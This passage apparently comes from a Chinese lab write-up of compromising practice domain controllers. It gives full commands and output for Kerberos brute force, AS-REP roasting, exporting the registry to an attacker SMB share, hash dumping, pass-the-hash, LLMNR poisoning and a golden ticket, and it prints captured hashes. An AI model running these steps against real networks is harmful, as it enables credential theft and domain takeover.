192.168.219.240 -C工具作用：通过 SMB/LDAP/RPC 等协议自动枚举 Windows 域环境信息12.3 尝试使用匿名登录目的：检查是否允许匿名访问SMB共享 结果：需要认证，匿名访问被拒绝smbclient -L //192.168.219.227/ -N12.4 kerberos 用户名枚举字典使用的是seclist，总共发现了3个用户，admin / zximena448 / charliekerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt --dc 192.168.219.227kerbrute：一款用于Kerberos用户枚举和密码爆破的工具。userenum：用户枚举模式。-d SOUPEDECODE.LOCAL：指定域名。/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt：用户名字典路径。--dc 192.168.219.240：指定域控制器的IP地址。12.5 爆破 kerberos 协议爆破kerberos 协议的时候，需要同步时间（Kerberos要求时间偏差在5分钟内）ntpdate 192.168.219.227  # 将本地时间与目标域控制器同步 kerbrute bruteuser --dc 192.168.219.227 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt charlie -v# 参数解析 bruteuser：针对单个用户进行密码爆破 --dc 192.168.219.240：域控制器IP -d SOUPEDECODE.LOCAL：域名 /usr/share/...usernames-dup.txt：密码字典（这里误用了用户名字典，应该用密码字典） charlie：目标用户名 -v：详细输出模式如果不同步时间就会出现如下结果为什么需要同步时间？Kerberos 认证流程中，客户端向 KDC（域控制器）请求票据（如 AS-REQ）时，会在请求中包含当前时间戳，KDC 收到请求后会：检查客户端时间戳与自身系统时间的偏差是否在允许范围内（默认通常为 5 分钟，由域策略Maximum tolerance for computer clock synchronization控制）。若偏差超过阈值，KDC 会直接拒绝请求，返回错误KDC_ERR_CLOCK_SKEW_TOO_GREAT（时钟偏差过大）。有了账号密码charlie/charlie，登录smb服务使用evil-winrm远程连接服务器（类似于3389端口的rdp远程连接），这个服务运行在5985端口evil-winrm -i 192.168.219.227 -u charlie -p charlie12.6 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果impacket-GetUserSPNs -request -dc-ip 192.168.219.227 SOUPEDECODE.LOCAL/charlie:charlie12.7 枚举域内用户SID再由于目标域不支持匿名登录（包括smb）所以不能使用-no-pass参数来枚举这个域的SID核心作用是通过 SMB/LDAP 协议查询目标系统的SID SMB/LDAP 及其账号和组信息python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 -no-passSID遍历，枚举域内用户，使用账号密码charlie:charlie（看看charlie这个用户有没有权限查看SID）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240正常枚举域内用户信息，把它归纳成一个字典python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 > user # 将枚举出来的用户都筛选出来，去掉多余字符 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt12.8 获取不需要预认证用户的AS-REP哈希正常情况下，银行（KDC）会强制要求你提供 “加密时间戳”（预认证）才给你凭证 —— 但如果某个用户的 “银行卡设置” 里，把 “必须要预认证” 这个选项关了（域用户未启用 Kerberos 预认证），会发生什么？→ 你不用提供 “加密时间戳”，只要报出 “身份证号”（用户名），银行就直接把 “加密的取钱凭证”（AS-REP 票据）给你了！→ 拿到这张凭证（AS-REP 哈希）后，你就可以拿回家 “慢慢试密码”（用 hashcat/john 爆破）—— 反正凭证是加密的，试错不会被银行发现（不会触发账号锁定）。这就是为什么要找 “不需要预认证的用户”：能无风险、无凭证地拿到他的 AS-REP 哈希，进而破解出明文密码。impacket-GetNPUsers -dc-ip 192.168.219.240 soupedecode.local/ -usersfile target_users.txt > hash12.9 AS-REP哈希爆破使用hashcat爆破不需要预认证的AS-REP哈希结果hashcat -a 0 -m 18200 res.txt /usr/share/wordlists/rockyou.txt提示，设备 #1：此次攻击所需的可分配设备内存不足，切换爆破工具john得到密码internet，那么配合前面的账号密码就是zximena448 ：internet，再次远程连接evil-winrm -i 192.168.219.240 -u zximena448 -p internet使用smbclient连接smb服务，查看有什么东西smbclient -L //192.168.219.240/ -U zximena448使用这个用户连接C$这个smb共享文件夹再连接ADMIN$这个共享文件夹，也能连接（不过没有发现什么可用的文件）在C$共享文件夹中找到flag用zximena448账号查询域内用户信息，获取高权限账号（如Administrator）的线索。12.10 收集 LDAP 信息目的：获取域内用户列表、权限分组（如Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如Administrator）。必要性：没有域内用户信息，后续攻击会盲目尝试，效率极低。前提：拥有至少一个有效的域内用户凭证（如zximena448:internet），且域控的 LDAP 端口（389）开放。原理：域内普通用户默认有权限查询 LDAP 目录的基础信息。命令如下ldapsearch -x -H ldap://192.168.219.240 -D "zximena448@SOUPEDECODE.LOCAL" -w 'internet' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=zximena448" memberOf > ldap_result.txt-x使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。-H ldap://192.168.215.25指定 LDAP 服务器地址（这里是域控的 IP）。-D "zximena448@SOUPEDECODE.LOCAL"绑定的用户 DN（用户名），即使用zximena448的凭证登录 LDAP。-w 'jesuschrist'绑定用户的密码（zximena448的密码）。-b 'DC=SOUPEDECODE,DC=LOCAL'查询的基准 DN（域的根目录），即从整个域范围查询。"sAMAccountName=zximena448"过滤条件：只查询sAMAccountName为zximena448的用户（精准定位自身）。memberOf只返回该用户的memberOf字段（即所属的组）。> ldap_result.txt将结果输出到文件，方便查看。发现zximena448属于Backup Operators组，Backup Operators是 Windows 域内置的特权组，默认被赋予了“备份 / 恢复域控系统数据” 的核心权限，而 “备份数据” 的权限恰好覆盖了域控的敏感文件（如存储账号哈希的NTDS.dit、注册表SAM/SYSTEM等）。攻击方式：在 Kali 上启动 SMB 服务，用于接收从目标机器导出的敏感文件（如注册表备份）。impacket-smbserver -smb2support "share" .前提：Kali 的 SMB 端口（445）未被占用，且目标域控能访问 Kali 的 IP（网络连通性）。原理：通过 SMB 协议实现文件共享，方便接收从目标导出的备份文件。12.11 导出注册表备份文件通过impacket-reg从域控（192.168.219.240）导出SYSTEM/SAM/SECURITY注册表文件（含加密的凭证信息）。impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.219.240" backup -o '\\192.168.219.37\share'前提：拥有的域用户（zximena448）需具备读取域控注册表的权限（普通用户可能无此权限，此处可能因目标配置宽松成功）。原理：通过远程注册表服务导出系统关键注册表文件。此时smb服务的回显，备份文件，从域控服务器中传过来成功搭建 SMB 共享 + 导出注册表备份目的：SYSTEM/SAM/SECURITY注册表文件存储了系统加密的凭证（用户哈希、机器账户哈希等），导出后可离线解密。必要性：直接在域控上提取哈希可能触发告警，通过备份文件离线处理更隐蔽。就能看到开启smb共享文件夹的路径下面多了几个文件12.12 用secretsdump.py解密备份文件提取本地管理员哈希和机器账户（DC01$）哈希。目的：从备份文件中提取可直接用于攻击的哈希值（如DC01$机器账户哈希、本地管理员哈希）。必要性：原始注册表文件是加密的，必须用secretsdump结合bootKey解密才能得到可用的哈希。python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local前提：获取SYSTEM/SAM/SECURITY备份文件（本地解密），或拥有目标机器的管理员权限 / 机器账户哈希（远程导出）。原理：利用 Windows 的加密机制，通过bootKey解密哈希存储区。┌──(root㉿kali)-[/data/demo] └─# python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies ​ [*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:45820dc9be5c067950d71e306d3d14084a9a8a3f8e99d7c1f6074080bec85f7c2645011e654397553bc7cad19277e361caaee722709bdaf3bbcbd9f2d0c73b8cf27651387c664ede1f3f7d6845f7d14293fdbcda34eb89d5c665de89860a23833a531ee43e6841b586896e6dbef6ac4e16196af3c6e2070ca148d032697b02bca95820d079296377ba4df3c4201dd419d89b9357bf470139b53d31761452e0f94ae9273a16c3d43ae2404740b5ac085992a092187c1fc6a59d5edb24e8cd8aae2575639cadc4cc18c7c5e5e07f5bf06a6154bb92a1dbcbf00f5b6b3171cd5df73121e0afca158f50df3f3db64c9dad11 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:4408da87fddde5ecdffe27d1d8255bc1 [*] DPAPI_SYSTEM dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4 dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503 [*] NL$KM 0000   44 C5 ED CE F5 0E BF 0C  15 63 8B 8D 2F A3 06 8F   D........c../... 0010   62 4D CA D9 55 20 44 41  75 55 3E 85 82 06 21 14   bM..U DAuU>...!. 0020   8E FA A1 77 0A 9C 0D A4  9A 96 44 7C FC 89 63 91   ...w......D|..c. 0030   69 02 53 95 1F ED 0E 77  B5 24 17 BE 6E 80 A9 91   i.S....w.$..n... NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991 [*] Cleaning up...12.13 哈希传递攻击（PTH）目的：无需明文密码，直接用哈希值认证并横向移动到域控（DC01$是域控的机器账户，默认有高权限）。必要性：多数情况下无法获取明文密码，PTH 是域内横向的核心手段。前提：目标开启 SMB 服务（445 端口），且未禁用 NTLM 认证（默认启用）。原理：通过 NTLM 协议，用哈希替代明文密码完成认证。用nxc验证DC01$哈希的有效性，确认可横向到域控。nxc smb 192.168.219.240 -u target_users.txt -H 4408da87fddde5ecdffe27d1d8255bc1用DC01$哈希通过secretsdump.py导出域内所有用户哈希（包括Administrator）。通过DC01$权限导出域内所有用户哈希（包括Administrator），最终用管理员权限登录域控，实现对整个域的控制。python /usr/share/doc/python3-impacket/examples/secretsdump.py soupedecode.local/'DC01$'@192.168.219.240 -hashes :4408da87fddde5ecdffe27d1d8255bc112.14 完成渗透用Administrator哈希通过evil-winrm登录域控，完成渗透。前提：域控开启 WinRM 服务（5985/5986 端口），且拥有管理员级别的哈希或明文密码。原理：通过 WinRM 协议远程执行命令，类似 SSH 但针对 Windows。evil-winrm -i 192.168.219.240 -u Administrator -H 8982babd4da89d33210779a6c5b078bd12.15 总结从用户枚举到密码爆破获取初始凭证，通过AS-REP Roasting获取更高权限账户，利用注册表备份提取机器账户哈希，最终通过哈希传递攻击实现域控完全控制。13、DC03 ：中等13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有，这怎么打？nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了，哈哈哈哈，靶机重启，原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的，还有smb协议enum4linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录smb匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破smbnxc smb 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希，具体流程如下：监听局域网内的 LLMNR 请求：用Responder（你之前用过的工具）等软件，在攻击机上监听局域网内的 LLMNR 广播；伪造响应欺骗目标：当目标设备（比如域内的员工电脑）发起 LLMNR 请求（如解析\\共享打印机名）时，攻击机抢先回复：“我就是你要找的设备，我的 IP 是攻击机 IP”；骗取哈希值：目标设备相信后，会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接（比如访问共享文件夹），攻击机就能捕获到这个哈希；破解哈希或直接用哈希登录：拿到哈希后，可通过hashcat破解成明文密码，或直接用 “哈希传递（PTH）” 登录其他设备。13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中，攻击机和目标域内的员工电脑在同一个网段（192.168.215.0/24）：在 Kali 上启动Responder，开启 LLMNR 监听：员工在电脑上误输入\\不存在的共享名（比如\\file-server），DNS 解析失败，触发 LLMNR 广播；Responder捕获到这个请求，伪装成file-server回复员工电脑；员工电脑用当前登录用户（比如SOUPEDECODE\charlie）的 NTLM 哈希，尝试与攻击机建立 SMB 连接；Responder成功捕获到charlie的哈希，你后续就可以用这个哈希进行 PTH 攻击，登录其他域内设备。responder -I eth0 -wd这里应该是域控靶机的计划任务，所以能拿到hash拿到这个账号的hash，准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000---[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd[SMB] NTLMv2-SSP Username : soupedecode\xkate578[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码，查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹，发现user.txt尝试上传，发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户（用于发现这些用户的TGS票据，从而破解密码）13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户xkate578进行“密码暴力破解”的操作，核心目的是通过字典攻击尝试获取该用户的明文密码。ntpdate 192.168.215.25 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt xkate578 -v13.9 nxc爆破smb使用nxc内网渗透神器，使用相同的账号密码爆破smb服务器，全部失败13.10 获取不需要预认证用户的AS-REP哈希全部没有impacket-GetNPUsers -dc-ip 192.168.215.25 soupedecode.local/ -usersfile target_users.txt利用之前得到的密码 xkate578:jesuschristldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=xkate578" memberOf > ldap_result.txt参数作用-x使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。-H ldap://192.168.215.25指定 LDAP 服务器地址（这里是域控的 IP）。-D "xkate578@SOUPEDECODE.LOCAL"绑定的用户 DN（用户名），即使用xkate578的凭证登录 LDAP。-w 'jesuschrist'绑定用户的密码（xkate578的密码）。-b 'DC=SOUPEDECODE,DC=LOCAL'查询的基准 DN（域的根目录），即从整个域范围查询。"sAMAccountName=xkate578"过滤条件：只查询sAMAccountName为xkate578的用户（精准定位自身）。memberOf只返回该用户的memberOf字段（即所属的组）。> ldap_result.txt将结果输出到文件，方便查看。从结果中可以看到这个用户属于Account Operators组作用：创建 / 修改 / 删除普通域用户账号可在域内新增用户（如testuser）、修改现有用户的属性（如密码、登录脚本、所属组等），但不能修改域管理员（Domain Admins）等高级账号。管理用户组（非特权组）可创建新的普通用户组，或修改普通组的成员（如将zximena448加入某个组），但不能修改Domain Admins、Enterprise Admins等特权组。重置普通用户密码可强制重置普通域用户的密码（无需知道原密码），例如将zximena448的密码改为hacked123，进而控制该账号。查看域内用户 / 组的详细信息比普通用户拥有更高的 LDAP 查询权限，可获取更多域内账号的属性（如密码过期时间、登录次数等）。尝试利用net命令和这些凭证，向目标域添加一个用户，然后使用evil-winrm连接的时候，连接不上net rpc user add "it_support" "ItSupport@123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'将用户添加到远程管理组即可使用evil-winrm连接net rpc group addmem "Remote Management Users" it_support -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.215.25evil-winrm -i 192.168.215.25 -u it_support -p 'ItSupport@123'那么尝试添加管理员组呢？很明显，之前已经说过了，Account Operators组的用户，可创建新的普通用户组，或修改普通组的成员（如将zximena448加入某个组），但不能修改Domain Admins、Enterprise Admins等特权组。再看看管理员组有哪些用户，一个是Operators，一个是Administrator，两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中，有几个关键线索表明Operators是自定义组而非 Windows 内置组：Windows 内置操作员组都有特定的前缀：Backup OperatorsPrint OperatorsServer OperatorsAccount Operators而这里发现：组名：Operators（没有前缀）这不符合 Windows 内置组的命名规范sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点：sAMAccountName: Operators（没有数字后缀）Windows 内置组通常有特定的 sAMAccountName 格式例如内置的Account Operators的 sAMAccountName 是Account Operators另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码： - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户# 但可以重置这些用户的密码：- 通过组嵌套获得管理员权限的用户- 属于自定义管理组的用户再不清楚，就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户)xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码（回家重装了靶机，ip变了）net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102# 或者[root@kali] /home/kali/DC03❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!"rpcclient $># 然后连接evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组，那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢？现在试试┌──(root㉿kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102┌──(root㉿kali)-[~]└─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123'Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> whoamisoupedecode\administrator成功修改！都不需要去PTH（哈希传递攻击）了13.11 PTH攻击（hash传递）Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外，还有一个工具也可以看域内组织情况，叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始，先通过 nmap 扫描确定目标为域控制器，开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后，用 kerbrute 枚举到 charlie、administrator 等用户，爆破无果后通过 Responder 进行 LLMNR 投毒，捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578（属 Account Operators 组）的账号管理权限，先创建影子账号并加入远程管理组，成功登录后枚举域内用户，发现自定义组 Operators 隶属于 Domain Admins，且包含用户 fbeth103。重置 fbeth103 密码并登录，利用其间接域管理员权限，成功修改 Administrator 密码，获取域控最高权限，最终找到 root.txt，全程未依赖复杂漏洞，主要通过权限嵌套与凭据复用推进。14、DC04：难14.1 外网打点nmap -sS -p- -T4 192.168.0.103 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49710,49765 -T4 192.168.0.103 -A自动重定向到这个域名编辑下面的文件，将ip和域名加入进去# windows C:\Windows\System32\drivers\etc\hostslinux也要，不然扫描不到东西，这里他变成了重定向次数过多，而不是之前的无法访问网站echo "192.168.0.103 soupedecode.local" >> /etc/hosts使用dir进行目录扫描，扫出来一个这个目录dirb http://soupedecode.local还有一个服务器信息http://soupedecode.local/server-info这里有一个服务版本，可以使用searchsploit检索一下（没有发现任何有用的东西）我们一直往下翻，翻到了这个东西继续将这个域名添加到hosts中，就可以访问站点了，是一个登录框14.2 后台爆破打开burp，fuzz sql注入、xss字典，都没有结果，使用相同的账号密码字典爆破也没有结果继续信息收集smbclient -L //192.168.0.103/ -N后续也尝试了各种枚举，也没有东西。。。。。。后边去看了看别人写的，就是这个机子很容易出问题，爆破几次后，后面怎么爆破都是403了最后爆破出来账号密码是admin:nimda登录成功后会要求你输入ip地址可能是命令执行，但是尝试各种命令执行都失败了，只要和|，&相关的都不行，看来是做了过滤【RCE剖析】从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结----实战解析14.3 LLMNR那就来试试DC3的LLMNR，我们在这个输入框里输入kali的ip地址responder -I eth0 -wdecho "websvc::soupedecode:e2985b38b501aed2:E5E63AAD4B475A06D1ECE4C7F78A2E60:010100000000000080646EFE3946DC01F711F570D52509F5000000000200080045004B0042004F0001001E00570049004E002D0043003700380051004F0038004100440032003100490004003400570049004E002D0043003700380051004F003800410044003200310049002E0045004B0042004F002E004C004F00430041004C000300140045004B0042004F002E004C004F00430041004C000500140045004B0042004F002E004C004F00430041004C000700080080646EFE3946DC01060004000200000008003000300000000000000000000000004000005C18B02FEAC5263030D32A3F0BCCDD51E0CAD786D3DFBABF65601AC3E74CE55D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0030002E003100340038000000000000000000" > hashjohn hash --wordlist=/usr/share/wordlists/rockyou.txtwebsvc:jordan23密码已过期，应该知道怎么搞了吧14.5 近源攻击！按住esc进入选择用户界面，然后根据步骤一步一步走输入原来的账号密码选择ok，说明你密码输入对了随后就可以修改你的账号密码了14.6 smb信息收集账号密码 websvc:jordan23smbclient -L //192.168.0.103 -U "SOUPEDECODE.LOCAL/websvc%admin123"在c盘找到第一个flagsmbclient //192.168.0.103/C -U "SOUPEDECODE.LOCAL/websvc%admin123"14.7 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果14.8 枚举域内用户SIDpython /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/websvc@192.168.0.103 > usersgrep "SidTypeUser" /data/demo/users | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt14.9 获取不需要预认证用户的AS-REP哈希结果没有impacket-GetNPUsers -dc-ip 192.168.0.103 soupedecode.local/ -usersfile target_users.txt > hashcat hash | grep +14.10 ldapdomaindump收集 LDAP 信息，获取域内用户列表、权限分组（如Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如Administrator）。ldapdomaindump -u "SOUPEDECODE.LOCAL\websvc" -p admin123 192.168.0.103python -m http.server访问8000端口，看到用户不属于任何特权组，仅仅是普通用户仔细翻翻看，找到一个默认的账号密码rtina979 ：Z~l3JhcV#7Q-1#M同样的密码过期，需要近源攻击！smbclient //192.168.0.103/C$ -U "SOUPEDECODE.LOCAL/rtina979%Z~l3JhcV#7Q-1#M"这里给你们一张表，输入清楚了哈，我输了十多遍，艹14.11 二次smb信息收集此时就能正常登录了在rtina979用户的Documents文件夹里找到一个rar压缩包，把它下载下来解压需要密码fcrackzip 工具只能用于破解 ZIP 文件，而我们的文件是 RAR 格式。使用rar2john将 RAR 文件转换为 John the Ripper 可识别的哈希格式。提取哈希：rar2john Report.rar > report_hash.txt使用字典攻击（使用 rockyou.txt）：john --wordlist=/usr/share/wordlists/rockyou.txt report_hash.txt解压，输入密码PASSWORD123解压出来会发现当前目录有一个htm文件是一个渗透测试报告在这个报告最后，能看到krbtgt的hash内容14.12 黄金票据攻击条件：获取 KRBTGT 账户哈希- 通过 DCSync 或其他方式获取域 SID- 通过 LDAP 或 SMB 枚举知道域名- 目标域的完整名称获取到了KRBTGT哈希先验证一下是否是正确的，红色代表失败，紫色代表hash正确，或者账户禁用，或者密码过期等等0f55cdc40bd8f5814587f7e6b2f85e6f14.12.1 获取域SID域SID为：S-1-5-21-2986980474-46765180-2505414164python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/rtina979@192.168.0.10314.12.2 同步域时间在平时可能会遇到kali和靶机的时间一直都不同步，怎么使用ntpdate或者其他时间同步工具，就是同步不起来，就需要使用下面第一行的命令了systemctl stop systemd-timesyncd # 停止自动时间同步服务 ntpdate 192.168.0.103 # 强制同步时间14.12.3 生成管理员的黄金票据impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local  administrator14.12.4 导入票据到环境变量export KRB5CCNAME=administrator.ccache14.12.5 使用票据impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.0.103至此渗透完成啦14.13 总结DC04 域渗透从外网打点起步，nmap 扫描发现目标开放 80、88、445 等端口，访问 80 端口需配置 hosts 解析域名，目录扫描找到后台登录页。爆破无果后，利用后台 IP 输入框发起 LLMNR 投毒，捕获 websvc 用户哈希并破解密码，通过近源攻击修改过期密码。登录 SMB 获取首个 flag 后，枚举域用户发现 rtina979 账号及密码，再次近源攻击修改密码。登录其 SMB 下载加密压缩包，破解后得到渗透报告，从中提取 krbtgt 用户哈希。获取域 SID 并同步时间后，生成 Administrator 黄金票据，导入环境变量后通过 wmiexec 成功登录域控，获取最高权限，全程依赖凭据获取与票据攻击，突破多重限制完成渗透。15、广告时间点击即达16、往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 